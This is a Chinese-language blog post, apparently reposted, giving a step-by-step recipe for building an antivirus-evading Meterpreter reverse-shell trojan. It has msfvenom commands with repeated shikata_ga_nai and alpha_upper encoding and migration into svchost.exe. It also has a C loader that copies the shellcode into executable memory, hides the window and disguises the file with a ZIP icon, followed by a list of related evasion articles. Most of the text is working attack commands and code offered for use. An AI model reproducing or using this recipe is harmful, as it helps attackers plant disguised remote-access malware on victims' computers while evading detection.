MSF编码+VS编译木马免杀
MSF编码+VS编译木马免杀
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe -f c > /root/Desktop/shellcode.c
1.-e x86/shikata_ga_nai -i 15是用 -e x86/shikata_ga_hai编码15次
2.PrependMigrate=true PrependMIgrateProx=svchost.exe是使这个程序会默认迁移到svchost.exe进程(这是微软自带的一个进程)
3.还可以使用windows/meterpreter/reverse_tcp_rc4这个payload,对会话进行加密,增加免杀能力。(需要设置RC4PASSWORD=)
执行上面代码后,桌面会有一个shellcode.c文件
将其移到 windows,用记事本打开会有 :unsigned char buf[] =”一长串数字”
接着我们用vs2022去开始编译木马
在visual studio下新建一个c++的win32项目将以下代码模板复制进去,在把你得到的shellcode那长串数字复制到shellcode的位置。
#include<stdio.h>
#include<windows.h>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //去除窗口
unsigned char shellcode[]= (这里就是shellcode)
void main()
{LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);memcpy(Memory, shellcode, sizeof(shellcode));((void(*)())Memory)();
}
《可能会出现的问题》
编译方法网上有很多种,这个时候已经可以编译了,但是我们还可以对图标进行更改伪装:右击你的项目—>添加—>资源—>图标—>新建,再用电脑的搜索查找*.ico,找到 ZIP的图标找到你这个项目的文件夹下会有一个zip.ico文件,将zip.ico替换成icon1.ico,再次编译
再次编译的结果:
测试了一下效果,火绒是真的强,刚生成就被杀。电脑管家发现不了,所以确实能绕过一部分WAF
原文连接:
https://www.freebuf.com/sectool/166682.html?replytocom=247112
其他免杀:
同时使用两个编译器免杀(编译时间比较久)
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/shell2.exe
MSF编码+VS编译木马免杀相关推荐
- 渗透测试-木马免杀的几种方式
木马免杀的几种方式 文章目录 木马免杀的几种方式 前言 1.裸奔马的尝试 2.部署一下kali上的apache服务,令目标机器能够访问下载我们生成的木马 2.1.kali中是自带有apache的,启动 ...
- msfvenom——木马免杀篇
msfvenom--木马免杀篇 目录 msfvenom--木马免杀篇 c语言执行 生成shellcode.c c语言执行 检查 python语言执行 方法一:python加载C代码 方法2:py2ex ...
- 迁移Veil:手工打造Windows下编译的免杀Payload
作者:RedFree 本文转自乌云 Veil对Payload的免杀已经做的很好了,最新的Veil有39个可用的Payload.但是有时候需要使用Windows来完成所有的渗透测试工作,Linux和Wi ...
- 0x06 木马免杀篇、0x07应急与响应、0x08 安全防御篇、0x09 其他问题篇
来源如下图:(微信公众号:0x00实验室) 0x06 木马免杀篇 免杀可以先fuzz 定位出被查杀的语句,然后对被查杀那部分进行一波操作,像是加密啊.编 码啊.动态执行啊什么的,或者 ...
- PHP一句话木马免杀(通过VirusTotal测试)
PHP一句话木马免杀 仅用于学习与交流,请勿用于非法用途!!! 简介与思路 免杀技术全称为反杀毒技术Anti Anti- Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒 ...
- 黑客攻击-木马免杀之PE文件
当你好不容易弄出来一个木马(具体可参考这里)的时候,却被杀毒软件轻易的就检测出来了,那一切岂不是白费了.Win10中的windows defender基于流量检测很容易把常见的木马程序检测出来,那怎么 ...
- PHP一句话木马免杀学习
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POS ...
- cobalt strike木马免杀
0x001-针对powershell免杀 工具:Invoke-Obfuscation 操作实例: 1.利用CS生成powershell木马 2.进入invoke-Obsfuscation文件,使用po ...
- Kali木马免杀,权限提升(kali本地木马免杀)
由于现在版本的木马查杀工具更新之快,木马在计算机上基本是裸奔的,再好的免杀技术也逃不过工具的查杀,下面是我研究很久的本地木马免杀,基本都是网上的百度总结,把可以是实现免杀的木马生成进行了总结. 免杀成 ...
最新文章
- 记录几个vim的命令
- Disruptor并发框架--学习笔记
- 初识Mysql(一)
- python3.6.5安装tensorflow_Win10下用Anaconda安装TensorFlow(图文教程)
- BLP模型(Bell-La Padula模型)
- 利用mybatis插件开发动态更改sql
- 外卖小程序邀请入口获取推广路径
- 最难编程语言排名!不接受反驳!!!
- 【KD】2022 计算机学报 深度学习中知识蒸馏研究综述
- 微客侠:解决微信内直接打开淘宝链接
- 信号隔离器的功能原理是什么?
- 【Android 】零基础到飞升 | Service初涉
- JVM笔记:Java虚拟机的字节码指令详解
- 试用多片2K×8的RAM扩展为4K×16的RAM(下面用多片1K×4的RAM扩展为2K×8的RAM代替之, 二者原理相同)(二〇二〇年山东大学数字电路906综合题第1题)(全网第一手资料)
- leetcode 594. 最长和谐子序列python
- 机器学习、人工智能最新资料pdf免币下载
- 谈谈从事IT测试行业的我,对于买房买车有什么样的感受
- 突破百度网盘限速工具Pandownload作者被抓,知乎网友怎么看?
- vintage、迁移率、滚动率、入催率等概念——看完你就懂了
- 五分钟带你玩转docker(三)全网最新最简单docker安装方式,楼主亲测